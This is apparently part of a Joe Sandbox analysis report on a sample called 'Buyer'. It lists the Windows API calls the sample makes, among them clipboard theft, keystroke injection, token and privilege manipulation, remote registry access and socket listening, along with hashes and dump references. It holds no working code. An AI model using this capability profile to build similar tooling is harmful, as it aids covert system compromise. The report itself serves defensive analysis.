                                                                                                    • API String ID: 2191629493-0
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00F5F656
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F5F673
                                                                                                    • IsIconic.USER32(00000000), ref: 00F5F67C
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F5F68E
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F5F6A4
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F5F6AB
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F5F6B7
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F5F6C8
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F5F6D0
                                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00F5F6D8
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F5F6DB
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F6F4
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F5F6FF
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F709
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F5F70E
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F717
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F5F71C
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F726
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F5F72B
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F5F72E
                                                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00F5F74C
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000000), ref: 00F5F754
                                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 00F5F75C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 1155518417-2988720461
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA1DA5: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FA1DEF
                                                                                                      • Part of subcall function 00FA1DA5: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FA1E1C
                                                                                                      • Part of subcall function 00FA1DA5: GetLastError.KERNEL32 ref: 00FA1E2C
                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00FA1968
                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00FA198A
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FA199B
                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FA19B3
                                                                                                    • GetProcessWindowStation.USER32 ref: 00FA19CC
                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00FA19D6
                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FA19F2
                                                                                                      • Part of subcall function 00FA17A1: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FA18DE), ref: 00FA17B6
                                                                                                      • Part of subcall function 00FA17A1: CloseHandle.KERNEL32(?,?,00FA18DE), ref: 00FA17CB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                    • String ID: $default$winsta0
                                                                                                    • API String ID: 22674027-1027155976
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA17DB: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FA17F6
                                                                                                      • Part of subcall function 00FA17DB: GetLastError.KERNEL32(?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1802
                                                                                                      • Part of subcall function 00FA17DB: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1811
                                                                                                      • Part of subcall function 00FA17DB: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1818
                                                                                                      • Part of subcall function 00FA17DB: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FA182F
                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FA12AE
                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FA12E2
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FA12F9
                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00FA1333
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FA134F
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FA1366
                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00FA136E
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00FA1375
                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FA1396
                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00FA139D
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FA13CC
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FA13EE
                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FA1400
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1427
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA142E
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1437
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA143E
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1447
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA144E
                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FA145A
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA1461
                                                                                                      • Part of subcall function 00FA1875: GetProcessHeap.KERNEL32(00000008,00FA1293,?,00000000,?,00FA1293,?), ref: 00FA1883
                                                                                                      • Part of subcall function 00FA1875: HeapAlloc.KERNEL32(00000000,?,00000000,?,00FA1293,?), ref: 00FA188A
                                                                                                      • Part of subcall function 00FA1875: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00FA1293,?), ref: 00FA1899
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 4175595110-0
                                                                                                    APIs
                                                                                                    • OpenClipboard.USER32(00FDDC1C), ref: 00FBF2B0
                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00FBF2BE
                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00FBF2CA
                                                                                                    • CloseClipboard.USER32 ref: 00FBF2D6
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00FBF30E
                                                                                                    • CloseClipboard.USER32 ref: 00FBF318
                                                                                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00FBF343
                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00FBF350
                                                                                                    • GetClipboardData.USER32(00000001), ref: 00FBF358
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00FBF369
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?), ref: 00FBF3A9
                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00FBF3BF
                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00FBF3CB
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00FBF3DC
                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00FBF3FE
                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00FBF41B
                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00FBF459
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00FBF47A
                                                                                                    • CountClipboardFormats.USER32 ref: 00FBF49B
                                                                                                    • CloseClipboard.USER32 ref: 00FBF4E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 420908878-0
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00FB712D
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00FB7181
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FB71BD
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FB71E4
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FB7221
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FB724E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                    • Opcode ID: 80accc95e109793d8b640447de215bc77bebb1fdf00dccee8fc7009ed35de653
                                                                                                    • Instruction ID: 932ed8ea9b8a22a1e3e0d1610e2e0350b6036718537c587420f533d6320daf7e
                                                                                                    • Opcode Fuzzy Hash: 80accc95e109793d8b640447de215bc77bebb1fdf00dccee8fc7009ed35de653
                                                                                                    • Instruction Fuzzy Hash: 09D15272508300AFD314EBA5CC85EABB7ECAF88704F04491DF985D7291EB78D949DB62
                                                                                                    APIs
                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FB44AF
                                                                                                    • _wcslen.LIBCMT ref: 00FB44DC
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FB450C
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FB452D
                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00FB453D
                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FB45C4
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FB45CF
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FB45DA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                    • String ID: :$\$\??\%s
                                                                                                    • API String ID: 1149970189-3457252023
                                                                                                    • Opcode ID: 6605d70d2614c38c3b1983e976f6aa8eff56c674b2f7c5c6938bbc562deaeb1d
                                                                                                    • Instruction ID: 99dbfa69f3a71f25e6d94865303a046856b1988f9f5c619ab862e498ac492c80
                                                                                                    • Opcode Fuzzy Hash: 6605d70d2614c38c3b1983e976f6aa8eff56c674b2f7c5c6938bbc562deaeb1d
                                                                                                    • Instruction Fuzzy Hash: C331D2B2900109ABDB219FA1DC49FEB37BDEF89710F1040B6F609D6165EB74A7449F20
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FCD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FCBE35,?,?), ref: 00FCD13C
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD178
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD1E6
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD21C
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCC6C5
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00FCC730
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FCC754
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00FCC7B3
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00FCC86E
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FCC8DB
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FCC970
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00FCC9C1
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FCCA6A
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FCCB09
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FCCB16
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                    • String ID:
                                                                                                    • API String ID: 3102970594-0
                                                                                                    • Opcode ID: b67a77dc09ece93f961399cb5ed3ba7cf367665a40340e4aca8965fbf8c44c9b
                                                                                                    • Instruction ID: 3a07a7b2133e01b75fb8ae5f60c5cc87010aa15f5e1fa8075e6332abc37ef9f4
                                                                                                    • Opcode Fuzzy Hash: b67a77dc09ece93f961399cb5ed3ba7cf367665a40340e4aca8965fbf8c44c9b
                                                                                                    • Instruction Fuzzy Hash: 9E026E716042019FC714DF28C995F2ABBE5EF88314F18849DF84ACB2A2D735ED46DB91
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F43E0E,?,?,00F82A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F44017
                                                                                                      • Part of subcall function 00FAE7DA: GetFileAttributesW.KERNEL32(?,00FAD57A), ref: 00FAE7DB
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00FAD707
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00FAD7C2
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00FAD7D5
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00FAD7F2
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FAD81C
                                                                                                      • Part of subcall function 00FAD881: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00FAD801,?,?), ref: 00FAD897
                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00FAD838
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00FAD849
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                    • Opcode ID: f07e8412df304db103ef11a35423bcadbeb6f0b2f4230e7a54c4cb68f8160fde
                                                                                                    • Instruction ID: 99bd5993d1044e567856413391bf6bfa05aa6b81d5ba6e1fab740eb4ee328b61
                                                                                                    • Opcode Fuzzy Hash: f07e8412df304db103ef11a35423bcadbeb6f0b2f4230e7a54c4cb68f8160fde
                                                                                                    • Instruction Fuzzy Hash: 6A616371C0110DAFCF05EBA0DD929EDBBB9AF15310F204169E856B7191DB38AF09EB61
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1737998785-0
                                                                                                    • Opcode ID: 006caf9efc63fdc1f61c75fbd6487d82a5dec1551e4bbaec37c8127c3a95a5ea
                                                                                                    • Instruction ID: 9660a1f20b2f8345326f9c2b609ea3d6f87c6bcff1e3b80ffd1790c57fb901ee
                                                                                                    • Opcode Fuzzy Hash: 006caf9efc63fdc1f61c75fbd6487d82a5dec1551e4bbaec37c8127c3a95a5ea
                                                                                                    • Instruction Fuzzy Hash: 5A419D35605611AFD720DF26E888F55BBA5EF44328F18C0A9E8198B662C735EC45EFD0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA1DA5: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FA1DEF
                                                                                                      • Part of subcall function 00FA1DA5: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FA1E1C
                                                                                                      • Part of subcall function 00FA1DA5: GetLastError.KERNEL32 ref: 00FA1E2C
                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00FAEF73
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                    • Opcode ID: dd507d98118f0b5c7ec380581faa093c14c17276f0fdfe2e6b0b7ac1f75ec715
                                                                                                    • Instruction ID: da791e5471d2a0df177e6e4a77f2c4c3012580ba29ad692ddbfd75138eb1382a
                                                                                                    • Opcode Fuzzy Hash: dd507d98118f0b5c7ec380581faa093c14c17276f0fdfe2e6b0b7ac1f75ec715
                                                                                                    • Instruction Fuzzy Hash: 4B01F9F2B202146FF72466789C89FBF775CEB46350F150825FD02E70D1C6645C40B290
                                                                                                    APIs
                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00FC19FD
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC1A0A
                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00FC1A41
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC1A4C
                                                                                                    • closesocket.WSOCK32(00000000), ref: 00FC1A7B
                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00FC1A8A
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC1A94
                                                                                                    • closesocket.WSOCK32(00000000), ref: 00FC1AC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 540024437-0
                                                                                                    • Opcode ID: cce0559d34ce398ce11366628318e3847b2174a53933ae6094875ff44981f17f
                                                                                                    • Instruction ID: 57191c3039533efbe4c9beaed28ca239290958043f5e254b6cbdeda608533af9
                                                                                                    • Opcode Fuzzy Hash: cce0559d34ce398ce11366628318e3847b2174a53933ae6094875ff44981f17f
                                                                                                    • Instruction Fuzzy Hash: 27418D31A011059FD714DF28C595F29BBE6BF46328F18818DD8568B293C775EC82EBE0
                                                                                                    APIs
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F846DA,?,?,00000000,00000000), ref: 00FB3748
                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F846DA,?,?,00000000,00000000), ref: 00FB375F
                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00F846DA,?,?,00000000,00000000,?,?,?,?,?,?,00F45533), ref: 00FB376F
                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00F846DA,?,?,00000000,00000000,?,?,?,?,?,?,00F45533), ref: 00FB3780
                                                                                                    • LockResource.KERNEL32(00F846DA,?,?,00F846DA,?,?,00000000,00000000,?,?,?,?,?,?,00F45533,?), ref: 00FB378F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
